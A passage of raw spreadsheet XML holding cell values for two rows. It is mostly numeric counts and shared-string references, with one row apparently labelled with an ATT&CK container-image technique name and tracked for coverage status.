      <c r="KT107" s="105">
        <v>0</v>
      </c>
      <c r="KU107" s="106">
        <v>0</v>
      </c>
      <c r="KV107" s="497">
        <v>0</v>
      </c>
      <c r="KW107" s="107">
        <v>0</v>
      </c>
      <c r="KX107" s="107">
        <v>0</v>
      </c>
      <c r="KY107" s="108">
        <v>0</v>
      </c>
      <c r="KZ107" s="109">
        <v>0</v>
      </c>
      <c r="LA107" s="110">
        <v>0</v>
      </c>
      <c r="LB107" s="501">
        <v>0</v>
      </c>
      <c r="LC107" s="111">
        <v>0</v>
      </c>
      <c r="LD107" s="111">
        <v>0</v>
      </c>
      <c r="LE107" s="112">
        <v>0</v>
      </c>
      <c r="LF107" s="113">
        <v>0</v>
      </c>
      <c r="LG107" s="114">
        <v>0</v>
      </c>
      <c r="LH107" s="503">
        <v>0</v>
      </c>
      <c r="LI107" s="115">
        <v>0</v>
      </c>
      <c r="LJ107" s="115">
        <v>0</v>
      </c>
      <c r="LK107" s="116">
        <v>0</v>
      </c>
      <c r="LL107" s="117">
        <v>36</v>
      </c>
      <c r="LM107" s="507">
        <v>36</v>
      </c>
      <c r="LN107" s="119">
        <v>1</v>
      </c>
      <c r="LO107" s="119">
        <v>4</v>
      </c>
      <c r="LP107" s="119">
        <v>34</v>
      </c>
      <c r="LQ107" s="119">
        <v>1</v>
      </c>
      <c r="LR107" s="119">
        <v>34</v>
      </c>
      <c r="LS107" s="119">
        <v>34</v>
      </c>
      <c r="LT107" s="382"/>
      <c r="LU107" s="117">
        <v>0</v>
      </c>
      <c r="LV107" s="118">
        <v>0</v>
      </c>
      <c r="LW107" s="507">
        <v>0</v>
      </c>
      <c r="LX107" s="119">
        <v>0</v>
      </c>
      <c r="LY107" s="119">
        <v>0</v>
      </c>
      <c r="LZ107" s="119">
        <v>0</v>
      </c>
      <c r="MA107" s="117">
        <v>0</v>
      </c>
      <c r="MB107" s="118">
        <v>0</v>
      </c>
      <c r="MC107" s="507">
        <v>0</v>
      </c>
      <c r="MD107" s="119">
        <v>0</v>
      </c>
      <c r="ME107" s="119">
        <v>0</v>
      </c>
      <c r="MF107" s="119">
        <v>0</v>
      </c>
      <c r="MG107" s="117">
        <v>0</v>
      </c>
      <c r="MH107" s="118">
        <v>0</v>
      </c>
      <c r="MI107" s="507">
        <v>0</v>
      </c>
      <c r="MJ107" s="119">
        <v>0</v>
      </c>
      <c r="MK107" s="119">
        <v>0</v>
      </c>
      <c r="ML107" s="119">
        <v>0</v>
      </c>
      <c r="MM107" s="117">
        <v>1</v>
      </c>
      <c r="MN107" s="118" t="s">
        <v>4152</v>
      </c>
      <c r="MO107" s="507">
        <v>1</v>
      </c>
      <c r="MP107" s="119" t="s">
        <v>2501</v>
      </c>
      <c r="MQ107" s="119">
        <v>1</v>
      </c>
      <c r="MR107" s="119">
        <v>1</v>
      </c>
      <c r="MS107" s="117">
        <v>0</v>
      </c>
      <c r="MT107" s="118">
        <v>0</v>
      </c>
      <c r="MU107" s="507">
        <v>0</v>
      </c>
      <c r="MV107" s="119">
        <v>0</v>
      </c>
      <c r="MW107" s="119">
        <v>0</v>
      </c>
      <c r="MX107" s="119">
        <v>0</v>
      </c>
      <c r="MY107" s="117">
        <v>0</v>
      </c>
      <c r="MZ107" s="118">
        <v>0</v>
      </c>
      <c r="NA107" s="507">
        <v>0</v>
      </c>
      <c r="NB107" s="119">
        <v>0</v>
      </c>
      <c r="NC107" s="119">
        <v>0</v>
      </c>
      <c r="ND107" s="119">
        <v>0</v>
      </c>
      <c r="NE107" s="117">
        <v>2</v>
      </c>
      <c r="NF107" s="118" t="s">
        <v>4429</v>
      </c>
      <c r="NG107" s="507">
        <v>2</v>
      </c>
      <c r="NH107" s="119" t="s">
        <v>4288</v>
      </c>
      <c r="NI107" s="119">
        <v>2</v>
      </c>
      <c r="NJ107" s="119">
        <v>2</v>
      </c>
      <c r="NK107" s="117">
        <v>0</v>
      </c>
      <c r="NL107" s="118">
        <v>0</v>
      </c>
      <c r="NM107" s="507">
        <v>0</v>
      </c>
      <c r="NN107" s="119">
        <v>0</v>
      </c>
      <c r="NO107" s="119">
        <v>0</v>
      </c>
      <c r="NP107" s="119">
        <v>0</v>
      </c>
      <c r="NQ107" s="117">
        <v>0</v>
      </c>
      <c r="NR107" s="118">
        <v>0</v>
      </c>
      <c r="NS107" s="507">
        <v>0</v>
      </c>
      <c r="NT107" s="119">
        <v>0</v>
      </c>
      <c r="NU107" s="119">
        <v>0</v>
      </c>
      <c r="NV107" s="119">
        <v>0</v>
      </c>
      <c r="NW107" s="117">
        <v>33</v>
      </c>
      <c r="NX107" s="118" t="s">
        <v>4430</v>
      </c>
      <c r="NY107" s="507">
        <v>33</v>
      </c>
      <c r="NZ107" s="119" t="s">
        <v>4159</v>
      </c>
      <c r="OA107" s="119">
        <v>2</v>
      </c>
      <c r="OB107" s="119">
        <v>33</v>
      </c>
      <c r="OC107" s="120">
        <v>5</v>
      </c>
      <c r="OD107" s="120">
        <v>5</v>
      </c>
      <c r="OE107" s="120">
        <v>5</v>
      </c>
      <c r="OF107" s="121">
        <v>4</v>
      </c>
      <c r="OG107" s="120">
        <v>3</v>
      </c>
      <c r="OH107" s="120">
        <v>3</v>
      </c>
      <c r="OI107" s="120">
        <v>3</v>
      </c>
      <c r="OJ107" s="120">
        <v>3</v>
      </c>
      <c r="OK107" s="383"/>
      <c r="OL107" s="120">
        <v>1</v>
      </c>
      <c r="OM107" s="120">
        <v>1</v>
      </c>
      <c r="ON107" s="120">
        <v>1</v>
      </c>
      <c r="OO107" s="193" t="s">
        <v>2503</v>
      </c>
      <c r="OP107" s="193">
        <v>1</v>
      </c>
      <c r="OQ107" s="464">
        <v>1</v>
      </c>
      <c r="OR107" s="120">
        <v>0</v>
      </c>
      <c r="OS107" s="120">
        <v>0</v>
      </c>
      <c r="OT107" s="120">
        <v>0</v>
      </c>
      <c r="OU107" s="193"/>
      <c r="OV107" s="193">
        <v>0</v>
      </c>
      <c r="OW107" s="464">
        <v>0</v>
      </c>
      <c r="OX107" s="120">
        <v>1</v>
      </c>
      <c r="OY107" s="120">
        <v>1</v>
      </c>
      <c r="OZ107" s="120">
        <v>1</v>
      </c>
      <c r="PA107" s="193" t="s">
        <v>4060</v>
      </c>
      <c r="PB107" s="193">
        <v>1</v>
      </c>
      <c r="PC107" s="464">
        <v>1</v>
      </c>
      <c r="PD107" s="120">
        <v>1</v>
      </c>
      <c r="PE107" s="120">
        <v>1</v>
      </c>
      <c r="PF107" s="120">
        <v>1</v>
      </c>
      <c r="PG107" s="193" t="s">
        <v>2987</v>
      </c>
      <c r="PH107" s="193">
        <v>1</v>
      </c>
      <c r="PI107" s="464">
        <v>1</v>
      </c>
      <c r="PJ107" s="120">
        <v>2</v>
      </c>
      <c r="PK107" s="120">
        <v>2</v>
      </c>
      <c r="PL107" s="120">
        <v>2</v>
      </c>
      <c r="PM107" s="193" t="s">
        <v>4061</v>
      </c>
      <c r="PN107" s="193">
        <v>2</v>
      </c>
      <c r="PO107" s="464">
        <v>1</v>
      </c>
      <c r="PP107" s="120">
        <v>2</v>
      </c>
      <c r="PQ107" s="120">
        <v>2</v>
      </c>
      <c r="PR107" s="120">
        <v>2</v>
      </c>
      <c r="PS107" s="193" t="s">
        <v>2576</v>
      </c>
      <c r="PT107" s="193">
        <v>2</v>
      </c>
      <c r="PU107" s="464">
        <v>1</v>
      </c>
      <c r="PV107" s="120">
        <v>0</v>
      </c>
      <c r="PW107" s="120">
        <v>0</v>
      </c>
      <c r="PX107" s="120">
        <v>0</v>
      </c>
      <c r="PY107" s="193"/>
      <c r="PZ107" s="193">
        <v>0</v>
      </c>
      <c r="QA107" s="464">
        <v>0</v>
      </c>
      <c r="QB107" s="120">
        <v>0</v>
      </c>
      <c r="QC107" s="120">
        <v>0</v>
      </c>
      <c r="QD107" s="120">
        <v>0</v>
      </c>
      <c r="QE107" s="193"/>
      <c r="QF107" s="193">
        <v>0</v>
      </c>
      <c r="QG107" s="464">
        <v>0</v>
      </c>
      <c r="QH107" s="120">
        <v>3</v>
      </c>
      <c r="QI107" s="120">
        <v>3</v>
      </c>
      <c r="QJ107" s="120">
        <v>2</v>
      </c>
      <c r="QK107" s="193" t="s">
        <v>2640</v>
      </c>
      <c r="QL107" s="193">
        <v>2</v>
      </c>
      <c r="QM107" s="464">
        <v>2</v>
      </c>
      <c r="QN107" s="120">
        <v>0</v>
      </c>
      <c r="QO107" s="120">
        <v>0</v>
      </c>
      <c r="QP107" s="120">
        <v>0</v>
      </c>
      <c r="QQ107" s="193"/>
      <c r="QR107" s="193">
        <v>0</v>
      </c>
      <c r="QS107" s="464">
        <v>0</v>
      </c>
      <c r="QT107" s="184"/>
      <c r="QU107" s="184"/>
      <c r="QV107" s="184"/>
      <c r="QW107" s="184"/>
      <c r="QX107" s="184"/>
      <c r="QY107" s="184"/>
      <c r="QZ107" s="184"/>
      <c r="RA107" s="184"/>
      <c r="RB107" s="184"/>
      <c r="RC107" s="184"/>
      <c r="RD107" s="184"/>
      <c r="RE107" s="184"/>
      <c r="RF107" s="184"/>
      <c r="RG107" s="184"/>
      <c r="RH107" s="184"/>
      <c r="RI107" s="184"/>
      <c r="RJ107" s="184"/>
      <c r="RK107" s="184"/>
      <c r="RL107" s="184"/>
      <c r="RM107" s="184"/>
      <c r="RN107" s="184"/>
      <c r="RO107" s="184"/>
      <c r="RP107" s="184"/>
      <c r="RQ107" s="184"/>
      <c r="RR107" s="184"/>
      <c r="RS107" s="184"/>
      <c r="RT107" s="184"/>
      <c r="RU107" s="184"/>
      <c r="RV107" s="184"/>
      <c r="RW107" s="184"/>
      <c r="RX107" s="184"/>
      <c r="RY107" s="184"/>
      <c r="RZ107" s="184"/>
      <c r="SA107" s="184"/>
      <c r="SB107" s="184"/>
      <c r="SC107" s="184"/>
      <c r="SD107" s="184"/>
      <c r="SE107" s="184"/>
      <c r="SF107" s="184"/>
      <c r="SG107" s="184"/>
      <c r="SH107" s="184"/>
      <c r="SI107" s="184"/>
      <c r="SJ107" s="184"/>
      <c r="SK107" s="184"/>
      <c r="SL107" s="184"/>
      <c r="SM107" s="184"/>
      <c r="SN107" s="184"/>
      <c r="SO107" s="184"/>
      <c r="SP107" s="184"/>
      <c r="SQ107" s="184"/>
      <c r="SR107" s="184"/>
      <c r="SS107" s="184"/>
      <c r="ST107" s="184"/>
      <c r="SU107" s="184"/>
      <c r="SV107" s="184"/>
      <c r="SW107" s="184"/>
      <c r="SX107" s="184"/>
      <c r="SY107" s="184"/>
      <c r="SZ107" s="184"/>
      <c r="TA107" s="184"/>
      <c r="TB107" s="184"/>
      <c r="TC107" s="184"/>
      <c r="TD107" s="184"/>
      <c r="TE107" s="184"/>
      <c r="TF107" s="184"/>
      <c r="TG107" s="184"/>
      <c r="TH107" s="184"/>
      <c r="TI107" s="184"/>
      <c r="TJ107" s="184"/>
      <c r="TK107" s="184"/>
      <c r="TL107" s="184"/>
      <c r="TM107" s="184"/>
      <c r="TN107" s="184"/>
      <c r="TO107" s="184"/>
      <c r="TP107" s="184"/>
      <c r="TQ107" s="184"/>
      <c r="TR107" s="184"/>
      <c r="TS107" s="184"/>
      <c r="TT107" s="184"/>
      <c r="TU107" s="184"/>
      <c r="TV107" s="184"/>
      <c r="TW107" s="184"/>
      <c r="TX107" s="184"/>
      <c r="TY107" s="184"/>
      <c r="TZ107" s="184"/>
      <c r="UA107" s="184"/>
      <c r="UB107" s="184"/>
      <c r="UC107" s="184"/>
      <c r="UD107" s="184"/>
      <c r="UE107" s="184"/>
      <c r="UF107" s="184"/>
      <c r="UG107" s="184"/>
      <c r="UH107" s="184"/>
      <c r="UI107" s="184"/>
      <c r="UJ107" s="184"/>
      <c r="UK107" s="184"/>
      <c r="UL107" s="184"/>
      <c r="UM107" s="184"/>
      <c r="UN107" s="184"/>
      <c r="UO107" s="184"/>
      <c r="UP107" s="184"/>
      <c r="UQ107" s="184"/>
      <c r="UR107" s="184"/>
      <c r="US107" s="184"/>
      <c r="UT107" s="184"/>
      <c r="UU107" s="184"/>
      <c r="UV107" s="184"/>
      <c r="UW107" s="184"/>
      <c r="UX107" s="184"/>
      <c r="UY107" s="184"/>
      <c r="UZ107" s="184"/>
      <c r="VA107" s="184"/>
      <c r="VB107" s="184"/>
      <c r="VC107" s="184"/>
      <c r="VD107" s="184"/>
      <c r="VE107" s="184"/>
      <c r="VF107" s="184"/>
      <c r="VG107" s="184"/>
      <c r="VH107" s="184"/>
      <c r="VI107" s="184"/>
      <c r="VJ107" s="184"/>
      <c r="VK107" s="184"/>
      <c r="VL107" s="184"/>
      <c r="VM107" s="184"/>
      <c r="VN107" s="184"/>
      <c r="VO107" s="184"/>
      <c r="VP107" s="184"/>
      <c r="VQ107" s="184"/>
      <c r="VR107" s="184"/>
      <c r="VS107" s="184"/>
      <c r="VT107" s="184"/>
      <c r="VU107" s="184"/>
      <c r="VV107" s="184"/>
      <c r="VW107" s="184"/>
      <c r="VX107" s="184"/>
      <c r="VY107" s="184"/>
    </row>
    <row r="108" spans="1:597" ht="39.950000000000003" customHeight="1">
      <c r="A108" s="82" t="s">
        <v>47</v>
      </c>
      <c r="B108" s="83" t="s">
        <v>4</v>
      </c>
      <c r="C108" s="83" t="s">
        <v>312</v>
      </c>
      <c r="D108" s="83" t="s">
        <v>166</v>
      </c>
      <c r="E108" s="83">
        <f t="shared" si="5"/>
        <v>72</v>
      </c>
      <c r="F108" s="83" t="s">
        <v>167</v>
      </c>
      <c r="G108" s="83" t="s">
        <v>4</v>
      </c>
      <c r="H108" s="83" t="s">
        <v>4</v>
      </c>
      <c r="I108" s="81" t="s">
        <v>1683</v>
      </c>
      <c r="J108" s="85" t="s">
        <v>742</v>
      </c>
      <c r="K108" s="81" t="s">
        <v>1684</v>
      </c>
      <c r="L108" s="81" t="s">
        <v>1692</v>
      </c>
      <c r="M108" s="378" t="s">
        <v>267</v>
      </c>
      <c r="N108" s="74" t="str">
        <f t="shared" si="3"/>
        <v>OK</v>
      </c>
      <c r="O108" s="485" t="str">
        <f t="shared" si="4"/>
        <v>New</v>
      </c>
      <c r="P108" s="91"/>
      <c r="Q108" s="379" t="s">
        <v>745</v>
      </c>
      <c r="R108" s="92" t="s">
        <v>1686</v>
      </c>
      <c r="S108" s="93" t="s">
        <v>799</v>
      </c>
      <c r="T108" s="92" t="s">
        <v>1462</v>
      </c>
      <c r="U108" s="94" t="s">
        <v>1687</v>
      </c>
      <c r="V108" s="95" t="s">
        <v>821</v>
      </c>
      <c r="W108" s="96" t="s">
        <v>1688</v>
      </c>
      <c r="X108" s="196" t="s">
        <v>1689</v>
      </c>
      <c r="Y108" s="83" t="s">
        <v>1690</v>
      </c>
      <c r="Z108" s="188" t="s">
        <v>1691</v>
      </c>
      <c r="AA108" s="182" t="s">
        <v>745</v>
      </c>
      <c r="AB108" s="183" t="s">
        <v>745</v>
      </c>
      <c r="AC108" s="302" t="s">
        <v>745</v>
      </c>
      <c r="AD108" s="83"/>
      <c r="AE108" s="83"/>
      <c r="AF108" s="384" t="s">
        <v>4</v>
      </c>
      <c r="AG108" s="88" t="s">
        <v>745</v>
      </c>
      <c r="AH108" s="341" t="s">
        <v>746</v>
      </c>
      <c r="AI108" s="353" t="s">
        <v>756</v>
      </c>
      <c r="AJ108" s="353" t="s">
        <v>747</v>
      </c>
      <c r="AK108" s="354" t="s">
        <v>745</v>
      </c>
      <c r="AL108" s="355" t="s">
        <v>747</v>
      </c>
      <c r="AM108" s="355" t="s">
        <v>756</v>
      </c>
      <c r="AN108" s="355" t="s">
        <v>756</v>
      </c>
      <c r="AO108" s="359" t="s">
        <v>756</v>
      </c>
      <c r="AP108" s="385" t="str">
        <f>M108&amp;"-frag"</f>
        <v>T1612-BuildImageOnHostNAT-frag</v>
      </c>
      <c r="AQ108" s="646">
        <v>119</v>
      </c>
      <c r="AR108" s="647"/>
      <c r="AS108" s="647">
        <v>118</v>
      </c>
      <c r="AT108" s="647">
        <v>0</v>
      </c>
      <c r="AU108" s="647">
        <v>118</v>
      </c>
      <c r="AV108" s="650" t="s">
        <v>4</v>
      </c>
      <c r="AW108" s="647">
        <v>1</v>
      </c>
      <c r="AX108" s="647">
        <v>1</v>
      </c>
      <c r="AY108" s="647">
        <v>0</v>
      </c>
      <c r="AZ108" s="647">
        <v>1</v>
      </c>
      <c r="BA108" s="381"/>
      <c r="BB108" s="101">
        <v>90</v>
      </c>
      <c r="BC108" s="102" t="s">
        <v>4062</v>
      </c>
      <c r="BD108" s="102">
        <v>63</v>
      </c>
      <c r="BE108" s="103" t="s">
        <v>4063</v>
      </c>
      <c r="BF108" s="103">
        <v>6</v>
      </c>
      <c r="BG108" s="104">
        <v>21</v>
      </c>
      <c r="BH108" s="105">
        <v>157</v>
      </c>
      <c r="BI108" s="106" t="s">
        <v>1879</v>
      </c>
      <c r="BJ108" s="497">
        <v>10</v>
      </c>
      <c r="BK108" s="107" t="s">
        <v>1880</v>
      </c>
      <c r="BL108" s="107">
        <v>1</v>
      </c>
      <c r="BM108" s="108">
        <v>10</v>
      </c>
      <c r="BN108" s="109">
        <v>247</v>
      </c>
      <c r="BO108" s="110" t="s">
        <v>2071</v>
      </c>
      <c r="BP108" s="501">
        <v>73</v>
      </c>
      <c r="BQ108" s="111" t="s">
        <v>2072</v>
      </c>
      <c r="BR108" s="111">
        <v>7</v>
      </c>
      <c r="BS108" s="112">
        <v>31</v>
      </c>
      <c r="BT108" s="113">
        <v>93</v>
      </c>
      <c r="BU108" s="114" t="s">
        <v>4064</v>
      </c>
      <c r="BV108" s="503">
        <v>66</v>
      </c>
      <c r="BW108" s="115" t="s">
        <v>4065</v>
      </c>
      <c r="BX108" s="115">
        <v>7</v>
      </c>
      <c r="BY108" s="116">
        <v>24</v>
      </c>
      <c r="BZ108" s="250">
        <v>291</v>
      </c>
      <c r="CA108" s="251" t="s">
        <v>4066</v>
      </c>
      <c r="CB108" s="505">
        <v>79</v>
      </c>
      <c r="CC108" s="252" t="s">
        <v>4067</v>
      </c>
      <c r="CD108" s="252">
        <v>5</v>
      </c>
      <c r="CE108" s="253">
        <v>73</v>
      </c>
      <c r="CF108" s="101">
        <v>384</v>
      </c>
      <c r="CG108" s="102" t="s">
        <v>4068</v>
      </c>
      <c r="CH108" s="102">
        <v>145</v>
      </c>
      <c r="CI108" s="103" t="s">
        <v>4069</v>
      </c>
      <c r="CJ108" s="103">
        <v>12</v>
      </c>
      <c r="CK108" s="104">
        <v>90</v>
      </c>
      <c r="CL108" s="105">
        <v>0</v>
      </c>
      <c r="CM108" s="106">
        <v>0</v>
      </c>
      <c r="CN108" s="497">
        <v>0</v>
      </c>
      <c r="CO108" s="107">
        <v>0</v>
      </c>
      <c r="CP108" s="107">
        <v>0</v>
      </c>
      <c r="CQ108" s="108">
        <v>0</v>
      </c>
      <c r="CR108" s="109">
        <v>3</v>
      </c>
      <c r="CS108" s="110" t="s">
        <v>1972</v>
      </c>
      <c r="CT108" s="501">
        <v>3</v>
      </c>
      <c r="CU108" s="111" t="s">
        <v>1947</v>
      </c>
      <c r="CV108" s="111">
        <v>1</v>
      </c>
      <c r="CW108" s="112">
        <v>3</v>
      </c>
      <c r="CX108" s="113">
        <v>250</v>
      </c>
      <c r="CY108" s="114" t="s">
        <v>2209</v>
      </c>
      <c r="CZ108" s="503">
        <v>76</v>
      </c>
      <c r="DA108" s="115" t="s">
        <v>2210</v>
      </c>
      <c r="DB108" s="115">
        <v>8</v>
      </c>
      <c r="DC108" s="116">
        <v>34</v>
      </c>
      <c r="DD108" s="101">
        <v>0</v>
      </c>
      <c r="DE108" s="102">
        <v>0</v>
      </c>
      <c r="DF108" s="102">
        <v>0</v>
      </c>
      <c r="DG108" s="103">
        <v>0</v>
      </c>
      <c r="DH108" s="103">
        <v>0</v>
      </c>
      <c r="DI108" s="104">
        <v>0</v>
      </c>
      <c r="DJ108" s="105">
        <v>0</v>
      </c>
      <c r="DK108" s="106">
        <v>0</v>
      </c>
      <c r="DL108" s="497">
        <v>0</v>
      </c>
      <c r="DM108" s="107">
        <v>0</v>
      </c>
      <c r="DN108" s="107">
        <v>0</v>
      </c>
      <c r="DO108" s="108">
        <v>0</v>
      </c>
      <c r="DP108" s="109">
        <v>0</v>
      </c>
      <c r="DQ108" s="110">
        <v>0</v>
      </c>
      <c r="DR108" s="501">
        <v>0</v>
      </c>
      <c r="DS108" s="111">
        <v>0</v>
      </c>
      <c r="DT108" s="111">
        <v>0</v>
      </c>
      <c r="DU108" s="112">
        <v>0</v>
      </c>
      <c r="DV108" s="113">
        <v>0</v>
      </c>
      <c r="DW108" s="114">
        <v>0</v>
      </c>
      <c r="DX108" s="503">
        <v>0</v>
      </c>
      <c r="DY108" s="115">
        <v>0</v>
      </c>
      <c r="DZ108" s="115">
        <v>0</v>
      </c>
      <c r="EA108" s="116">
        <v>0</v>
      </c>
      <c r="EB108" s="250">
        <v>12</v>
      </c>
      <c r="EC108" s="251" t="s">
        <v>4070</v>
      </c>
      <c r="ED108" s="505">
        <v>4</v>
      </c>
      <c r="EE108" s="252" t="s">
        <v>4071</v>
      </c>
      <c r="EF108" s="252">
        <v>1</v>
      </c>
      <c r="EG108" s="253">
        <v>4</v>
      </c>
      <c r="EH108" s="101">
        <v>12</v>
      </c>
      <c r="EI108" s="102" t="s">
        <v>4070</v>
      </c>
      <c r="EJ108" s="102">
        <v>4</v>
      </c>
      <c r="EK108" s="103" t="s">
        <v>4071</v>
      </c>
      <c r="EL108" s="103">
        <v>1</v>
      </c>
      <c r="EM108" s="104">
        <v>4</v>
      </c>
      <c r="EN108" s="105">
        <v>0</v>
      </c>
      <c r="EO108" s="106">
        <v>0</v>
      </c>
      <c r="EP108" s="497">
        <v>0</v>
      </c>
      <c r="EQ108" s="107">
        <v>0</v>
      </c>
      <c r="ER108" s="107">
        <v>0</v>
      </c>
      <c r="ES108" s="108">
        <v>0</v>
      </c>
      <c r="ET108" s="109">
        <v>0</v>
      </c>
      <c r="EU108" s="110">
        <v>0</v>
      </c>
      <c r="EV108" s="501">
        <v>0</v>
      </c>
      <c r="EW108" s="111">
        <v>0</v>
      </c>
      <c r="EX108" s="111">
        <v>0</v>
      </c>
      <c r="EY108" s="112">
        <v>0</v>
      </c>
      <c r="EZ108" s="113">
        <v>0</v>
      </c>
      <c r="FA108" s="114">
        <v>0</v>
      </c>
      <c r="FB108" s="503">
        <v>0</v>
      </c>
      <c r="FC108" s="115">
        <v>0</v>
      </c>
      <c r="FD108" s="115">
        <v>0</v>
      </c>
      <c r="FE108" s="116">
        <v>0</v>
      </c>
      <c r="FF108" s="101">
        <v>37</v>
      </c>
      <c r="FG108" s="102" t="s">
        <v>4072</v>
      </c>
      <c r="FH108" s="102">
        <v>10</v>
      </c>
      <c r="FI108" s="103" t="s">
        <v>4073</v>
      </c>
      <c r="FJ108" s="103">
        <v>3</v>
      </c>
      <c r="FK108" s="104">
        <v>10</v>
      </c>
      <c r="FL108" s="105">
        <v>0</v>
      </c>
      <c r="FM108" s="106">
        <v>0</v>
      </c>
      <c r="FN108" s="497">
        <v>0</v>
      </c>
      <c r="FO108" s="107">
        <v>0</v>
      </c>
      <c r="FP108" s="107">
        <v>0</v>
      </c>
      <c r="FQ108" s="108">
        <v>0</v>
      </c>
      <c r="FR108" s="109">
        <v>37</v>
      </c>
      <c r="FS108" s="110" t="s">
        <v>4072</v>
      </c>
      <c r="FT108" s="501">
        <v>10</v>
      </c>
      <c r="FU108" s="111" t="s">
        <v>4073</v>
      </c>
      <c r="FV108" s="111">
        <v>3</v>
      </c>
      <c r="FW108" s="112">
        <v>10</v>
      </c>
      <c r="FX108" s="113">
        <v>40</v>
      </c>
      <c r="FY108" s="114" t="s">
        <v>4074</v>
      </c>
      <c r="FZ108" s="503">
        <v>13</v>
      </c>
      <c r="GA108" s="115" t="s">
        <v>4075</v>
      </c>
      <c r="GB108" s="115">
        <v>4</v>
      </c>
      <c r="GC108" s="116">
        <v>13</v>
      </c>
      <c r="GD108" s="250">
        <v>14</v>
      </c>
      <c r="GE108" s="251" t="s">
        <v>3593</v>
      </c>
      <c r="GF108" s="505">
        <v>12</v>
      </c>
      <c r="GG108" s="252" t="s">
        <v>2557</v>
      </c>
      <c r="GH108" s="252">
        <v>2</v>
      </c>
      <c r="GI108" s="253">
        <v>11</v>
      </c>
      <c r="GJ108" s="101">
        <v>54</v>
      </c>
      <c r="GK108" s="102" t="s">
        <v>4076</v>
      </c>
      <c r="GL108" s="102">
        <v>25</v>
      </c>
      <c r="GM108" s="103" t="s">
        <v>4077</v>
      </c>
      <c r="GN108" s="103">
        <v>6</v>
      </c>
      <c r="GO108" s="104">
        <v>23</v>
      </c>
      <c r="GP108" s="105">
        <v>0</v>
      </c>
      <c r="GQ108" s="106">
        <v>0</v>
      </c>
      <c r="GR108" s="497">
        <v>0</v>
      </c>
      <c r="GS108" s="107">
        <v>0</v>
      </c>
      <c r="GT108" s="107">
        <v>0</v>
      </c>
      <c r="GU108" s="108">
        <v>0</v>
      </c>
      <c r="GV108" s="109">
        <v>3</v>
      </c>
      <c r="GW108" s="110" t="s">
        <v>1972</v>
      </c>
      <c r="GX108" s="501">
        <v>3</v>
      </c>
      <c r="GY108" s="111" t="s">
        <v>1947</v>
      </c>
      <c r="GZ108" s="111">
        <v>1</v>
      </c>
      <c r="HA108" s="112">
        <v>3</v>
      </c>
      <c r="HB108" s="113">
        <v>40</v>
      </c>
      <c r="HC108" s="114" t="s">
        <v>4074</v>
      </c>
      <c r="HD108" s="503">
        <v>13</v>
      </c>
      <c r="HE108" s="115" t="s">
        <v>4075</v>
      </c>
      <c r="HF108" s="115">
        <v>4</v>
      </c>
      <c r="HG108" s="116">
        <v>13</v>
      </c>
      <c r="HH108" s="101">
        <v>53</v>
      </c>
      <c r="HI108" s="102" t="s">
        <v>4078</v>
      </c>
      <c r="HJ108" s="102">
        <v>53</v>
      </c>
      <c r="HK108" s="103" t="s">
        <v>1788</v>
      </c>
      <c r="HL108" s="103">
        <v>3</v>
      </c>
      <c r="HM108" s="104">
        <v>18</v>
      </c>
      <c r="HN108" s="105">
        <v>157</v>
      </c>
      <c r="HO108" s="106" t="s">
        <v>1879</v>
      </c>
      <c r="HP108" s="497">
        <v>10</v>
      </c>
      <c r="HQ108" s="107" t="s">
        <v>1880</v>
      </c>
      <c r="HR108" s="107">
        <v>1</v>
      </c>
      <c r="HS108" s="108">
        <v>10</v>
      </c>
      <c r="HT108" s="109">
        <v>210</v>
      </c>
      <c r="HU108" s="110" t="s">
        <v>4079</v>
      </c>
      <c r="HV108" s="501">
        <v>63</v>
      </c>
      <c r="HW108" s="111" t="s">
        <v>4080</v>
      </c>
      <c r="HX108" s="111">
        <v>4</v>
      </c>
      <c r="HY108" s="112">
        <v>28</v>
      </c>
      <c r="HZ108" s="113">
        <v>53</v>
      </c>
      <c r="IA108" s="114" t="s">
        <v>4078</v>
      </c>
      <c r="IB108" s="503">
        <v>53</v>
      </c>
      <c r="IC108" s="115" t="s">
        <v>1788</v>
      </c>
      <c r="ID108" s="115">
        <v>3</v>
      </c>
      <c r="IE108" s="116">
        <v>18</v>
      </c>
      <c r="IF108" s="250">
        <v>265</v>
      </c>
      <c r="IG108" s="251" t="s">
        <v>4081</v>
      </c>
      <c r="IH108" s="505">
        <v>63</v>
      </c>
      <c r="II108" s="252" t="s">
        <v>4082</v>
      </c>
      <c r="IJ108" s="252">
        <v>2</v>
      </c>
      <c r="IK108" s="253">
        <v>63</v>
      </c>
      <c r="IL108" s="101">
        <v>318</v>
      </c>
      <c r="IM108" s="102" t="s">
        <v>4083</v>
      </c>
      <c r="IN108" s="102">
        <v>116</v>
      </c>
      <c r="IO108" s="103" t="s">
        <v>4084</v>
      </c>
      <c r="IP108" s="103">
        <v>5</v>
      </c>
      <c r="IQ108" s="104">
        <v>81</v>
      </c>
      <c r="IR108" s="105">
        <v>0</v>
      </c>
      <c r="IS108" s="106">
        <v>0</v>
      </c>
      <c r="IT108" s="497">
        <v>0</v>
      </c>
      <c r="IU108" s="107">
        <v>0</v>
      </c>
      <c r="IV108" s="107">
        <v>0</v>
      </c>
      <c r="IW108" s="108">
        <v>0</v>
      </c>
      <c r="IX108" s="109">
        <v>0</v>
      </c>
      <c r="IY108" s="110">
        <v>0</v>
      </c>
      <c r="IZ108" s="501">
        <v>0</v>
      </c>
      <c r="JA108" s="111">
        <v>0</v>
      </c>
      <c r="JB108" s="111">
        <v>0</v>
      </c>
      <c r="JC108" s="112">
        <v>0</v>
      </c>
      <c r="JD108" s="113">
        <v>210</v>
      </c>
      <c r="JE108" s="114" t="s">
        <v>4079</v>
      </c>
      <c r="JF108" s="503">
        <v>63</v>
      </c>
      <c r="JG108" s="115" t="s">
        <v>4080</v>
      </c>
      <c r="JH108" s="115">
        <v>4</v>
      </c>
      <c r="JI108" s="116">
        <v>28</v>
      </c>
      <c r="JJ108" s="101">
        <v>0</v>
      </c>
      <c r="JK108" s="102">
        <v>0</v>
      </c>
      <c r="JL108" s="102">
        <v>0</v>
      </c>
      <c r="JM108" s="103">
        <v>0</v>
      </c>
      <c r="JN108" s="103">
        <v>0</v>
      </c>
      <c r="JO108" s="104">
        <v>0</v>
      </c>
      <c r="JP108" s="105">
        <v>0</v>
      </c>
      <c r="JQ108" s="106">
        <v>0</v>
      </c>
      <c r="JR108" s="497">
        <v>0</v>
      </c>
      <c r="JS108" s="107">
        <v>0</v>
      </c>
      <c r="JT108" s="107">
        <v>0</v>
      </c>
      <c r="JU108" s="108">
        <v>0</v>
      </c>
      <c r="JV108" s="109">
        <v>0</v>
      </c>
      <c r="JW108" s="110">
        <v>0</v>
      </c>
      <c r="JX108" s="501">
        <v>0</v>
      </c>
